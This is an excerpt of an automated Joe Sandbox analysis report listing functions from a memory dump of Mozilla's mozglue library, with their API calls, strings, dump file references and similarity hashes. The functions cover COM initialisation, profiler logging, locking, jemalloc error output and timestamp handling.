Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 665E1FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 665E1FFD
__Init_thread_footer.LIBCMT ref: 665E2011
FreeLibrary.KERNEL32 ref: 665E2059

Strings

combase.dll, xrefs: 665E1FD9
CoCreateInstance, xrefs: 665E1FF7

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: 17d87b5db7896852783f08b5428b894cb824d12f78edd5dc4a8817dd76cf1d51
Instruction ID: 6181d881a8ff47ac26d50bd4d12dd9805ed459b161847f14fc965a6f6a6d2bd8
Opcode Fuzzy Hash: 17d87b5db7896852783f08b5428b894cb824d12f78edd5dc4a8817dd76cf1d51
Instruction Fuzzy Hash: E7118B75500266AFEF21DF16EC5FE5A3B6BFBD6355F008029FA0592280D7319820CFA1

Function 665E0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6660D9F0,00000000), ref: 665E0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 665E0F3C
__Init_thread_footer.LIBCMT ref: 665E0F50
FreeLibrary.KERNEL32(?,6660D9F0,00000000), ref: 665E0F86

Strings

CoInitializeEx, xrefs: 665E0F36
combase.dll, xrefs: 665E0F18

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 5c079e2c8d37f1ba12fff2f284e1cf0502faea1aa98f5e8b2a67922caac1c6b3
Instruction ID: b2446d78c8be58ce7c95113c9f48961cbd81265aa3d5f9c91e2b106a712b4cff
Opcode Fuzzy Hash: 5c079e2c8d37f1ba12fff2f284e1cf0502faea1aa98f5e8b2a67922caac1c6b3
Instruction Fuzzy Hash: 3311C2755042619BDF00CF66FC0BE563B67FBDA322F04822AEB1593240DB36A421CE99

Function 665E62E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 665E631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 665E633A
__Init_thread_footer.LIBCMT ref: 665E634E
FreeLibrary.KERNEL32 ref: 665E6376

Strings

CoUninitialize, xrefs: 665E6334
combase.dll, xrefs: 665E6316

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: e484bf44da0cc927d0d07edcfc2d387552e5fda4245d6e1bf3387d1bfa5d2105
Instruction ID: f7ee2a9a6c9d79a88c39462501d39326077a60988079d4b652c3b59a4d6b2a2d
Opcode Fuzzy Hash: e484bf44da0cc927d0d07edcfc2d387552e5fda4245d6e1bf3387d1bfa5d2105
Instruction Fuzzy Hash: 55014875904322CBEF05DF2BF95BA2877A3B7DA395F048169DB01C3280E771A411CE99

Function 6661F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6661F598), ref: 6661F621

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

GetCurrentThreadId.KERNEL32 ref: 6661F637
AcquireSRWLockExclusive.KERNEL32(6665F4B8,?,?,00000000,?,6661F598), ref: 6661F645
ReleaseSRWLockExclusive.KERNEL32(6665F4B8,?,?,00000000,?,6661F598), ref: 6661F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6661F62A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 91457e285c10b6697ab5b4e8e0dd5cd805375fabb0a39160a36c8ca5070bd9a2
Instruction ID: 2fe0e864287d4a457d68dbbfa67934fe2286ec7d0a81ed7c0119705fd5dac1cf
Opcode Fuzzy Hash: 91457e285c10b6697ab5b4e8e0dd5cd805375fabb0a39160a36c8ca5070bd9a2
Instruction Fuzzy Hash: 57F0B475104214ABDB00EF6AFC5A92ABFAFEBC629DF040011EB0593302CB354C018B65

Function 6661F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661F561

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

GetCurrentThreadId.KERNEL32 ref: 6661F577
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F585
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6661F56A
[I %d/%d] profiler_resume, xrefs: 6661F239
[I %d/%d] profiler_pause_sampling, xrefs: 6661F3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6661F499

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 6d93fb6be7d9a2c76ebc91fb8dfed53cf6cf8525f58cdc861be32c4133a5cfe5
Instruction ID: 0bc432d01d4ef7b6953e36188b7247af0ffe94df7f5469bd56fa03f4ec62b893
Opcode Fuzzy Hash: 6d93fb6be7d9a2c76ebc91fb8dfed53cf6cf8525f58cdc861be32c4133a5cfe5
Instruction Fuzzy Hash: 52F0B4755002109BDB00AF6AFC5A92ABFAFEBC629DF044011EB05D3302DB3148008B64

Function 666105F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6660CFAE,?,?,?,665D31A7), ref: 666105FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6660CFAE,?,?,?,665D31A7), ref: 66610616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,665D31A7), ref: 6661061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,665D31A7), ref: 66610627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6661061B, 66610625
<jemalloc>, xrefs: 666105FA, 6661060F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 1e67bcf1bb6e6a3618db90b8d1c21f53fb5f8b52652bfa1b7f2f3f0c540e6d89
Instruction ID: 11eb07afa99183cb720ca614a06a60cbc7748b83b2958f6b49ac1546c50cb31d
Opcode Fuzzy Hash: 1e67bcf1bb6e6a3618db90b8d1c21f53fb5f8b52652bfa1b7f2f3f0c540e6d89
Instruction Fuzzy Hash: D5E08CE290102037F6146256BC86EBB7A0DCBC6138F080039FE0E83301E94AAD1A51FA

Function 66629240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 66629BAE
free.MOZGLUE(?,?), ref: 66629BC3
free.MOZGLUE(?,?), ref: 66629BD9

Part of subcall function 666293B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 666294C8
Part of subcall function 666293B0: free.MOZGLUE(66629281,?), ref: 666294DD

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: a69da864baea40af5ae976c338e9b414ed85e0b7face44e07506defa686a4885
Instruction ID: 5bf5eddf715c179c0730a075a66c4ebf4aad223f174353d208a830bec7637e0f
Opcode Fuzzy Hash: a69da864baea40af5ae976c338e9b414ed85e0b7face44e07506defa686a4885
Instruction Fuzzy Hash: 19B18C71A047058BCB05CF59D88059FBBF9BFC9328B548629E859AB240DB31E946CFD1

Function 665E05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83fd7da91287ba355d54a1837a85a92683fd56219e928008e8acc289f17d5b77
Instruction ID: 893619de5d30d7e2a0eb5c5a81137471b921c2a7e416fb8d64f2e8e770f9a388
Opcode Fuzzy Hash: 83fd7da91287ba355d54a1837a85a92683fd56219e928008e8acc289f17d5b77
Instruction Fuzzy Hash: 25A147B09006158FDB14CF29D995B9AFBF2BF88304F40856ED48A97701EB31A995CFA0

Function 666171A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 66616060: moz_xmalloc.MOZGLUE(00000024,63CDD43C,00000000,?,00000000,?,?,66615FCB,666179A3), ref: 66616078

free.MOZGLUE(-00000001), ref: 666172F6
free.MOZGLUE(?), ref: 66617311

Strings

Copied unique strings, xrefs: 66617320
333s, xrefs: 66617226
Spliced unique strings, xrefs: 66617340
333s, xrefs: 6661731B

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 57b8412fcb17c5e31f7f2ebdea33295945d2e716c02a1a93a4e10b4a724fb309
Instruction ID: aefb10cf794064031f58036174ab5c233effc9b35f2d79b05f2e39eda0e6a4a6
Opcode Fuzzy Hash: 57b8412fcb17c5e31f7f2ebdea33295945d2e716c02a1a93a4e10b4a724fb309
Instruction Fuzzy Hash: 26716175F042198FDB09DF69E89069DFBB2AF94314F258129D80AA7250DB31AD46CBC1

Function 666314A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 666314C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 666314E2
GetCurrentThreadId.KERNEL32 ref: 66631546
InitializeConditionVariable.KERNEL32(?), ref: 666315BA
free.MOZGLUE(?), ref: 666316B4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 992bd791af16b8a78e754fe8fc830e2714e47112ac7af533c2ee03a3e65ebfed
Instruction ID: 6dd1ac4e8a39034187689b75586acaa9d52408d8148e85225092d7df2f431b4e
Opcode Fuzzy Hash: 992bd791af16b8a78e754fe8fc830e2714e47112ac7af533c2ee03a3e65ebfed
Instruction Fuzzy Hash: 636103719007609BDB11CF25EC80B9EBBB6BF8A318F44951CEE8A67201DB31A955CBD1

Function 6662C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6662C1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6662C293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6662C29E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: 8f8168ee6bd31baf58b7dc08a35e26d0b4e96ac726efb3863a6c2abd6a4ed0ed
Instruction ID: acc05872c3c93a60d1aec732b765d0c460b05e703662751ea29e605c888cc48a
Opcode Fuzzy Hash: 8f8168ee6bd31baf58b7dc08a35e26d0b4e96ac726efb3863a6c2abd6a4ed0ed
Instruction Fuzzy Hash: 79618B71D006188FCB55CFA8E8855AEBBBAFF89314F154529E907A7250C731ED84CFA1

Function 66629F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 66629FDB
free.MOZGLUE(?,?), ref: 66629FF0
free.MOZGLUE(?,?), ref: 6662A006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6662A0BE
free.MOZGLUE(?,?), ref: 6662A0D5
free.MOZGLUE(?,?), ref: 6662A0EB

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 4f76e643bfc817fe89a18430ad9003072d0859ede70d41ab51efeb44e9834d17
Instruction ID: 562bff2f689d7b0d01e4bef00e99aef592831f22e7d1c83c2ec5c769977c924f
Opcode Fuzzy Hash: 4f76e643bfc817fe89a18430ad9003072d0859ede70d41ab51efeb44e9834d17
Instruction Fuzzy Hash: 02619D759087429FC711CF18C48155AB7F9FFD8329F508669E8999B202EB32E986CFC1

Function 6662DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6662DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6662D38A,?), ref: 6662DC6F
free.MOZGLUE(?,?,?,?,?,6662D38A,?), ref: 6662DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6662D38A,?), ref: 6662DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6662D38A,?), ref: 6662DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6662D38A,?), ref: 6662DD4A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: b376b3220b248494e2050c9c79e10830ff0642ec58836e84a1139b9546ddaea0
Instruction ID: 7b8e0f6946ba9db8dd64cba8a0c381aeef948db270a79e4ab3762dce693b1398
Opcode Fuzzy Hash: b376b3220b248494e2050c9c79e10830ff0642ec58836e84a1139b9546ddaea0
Instruction Fuzzy Hash: 66417AB5A00616CFCB04CFA9D880A9ABBFAFF88314B554469DA46AB310D771FC00CF90

Function 665D39A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E744,ewcf,00000000,ewcf,?,665F6112), ref: 665D39AF
LeaveCriticalSection.KERNEL32(6665E744,?,665F6112), ref: 665D3A34
EnterCriticalSection.KERNEL32(6665E784,665F6112), ref: 665D3A4B
LeaveCriticalSection.KERNEL32(6665E784), ref: 665D3A5F

Strings

ewcf, xrefs: 665D39A3, 665D39A5
\ef, xrefs: 665D3A02

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: \ef$ewcf
API String ID: 3168844106-2176968677
Opcode ID: 875c09a99888957d81d7e094538e7e71a4d4b9802eb7e963d796db7df1be1f1c
Instruction ID: 1f22c04d6098effbaa58337795a10a84523ce9af9c09ee5d4e64e58fe64dc67a
Opcode Fuzzy Hash: 875c09a99888957d81d7e094538e7e71a4d4b9802eb7e963d796db7df1be1f1c
Instruction Fuzzy Hash: DB21F7326017518FCF15CF6AE853A2677A7EBC6710719052ED66693780EB30BC01CB9A

Function 6661CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6661CA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6661CA69
Sleep.KERNEL32 ref: 6661CADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6661CAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6661CAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6661CB19

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: 1d7907f21508c6bf7b5a803b3f6518bcd4cd8bd93278ef46161e337ea5efb0a8
Instruction ID: 4c1029ec3bc971eeb1967397775a8257c64e97db25c950012dbe3adebea0e129
Opcode Fuzzy Hash: 1d7907f21508c6bf7b5a803b3f6518bcd4cd8bd93278ef46161e337ea5efb0a8
Instruction Fuzzy Hash: CD212831A046488BC70AEF3DAC4516FFBBBFFC6305F408628E946A6140EF748955C791

Function 6662C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6662C82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6662C842

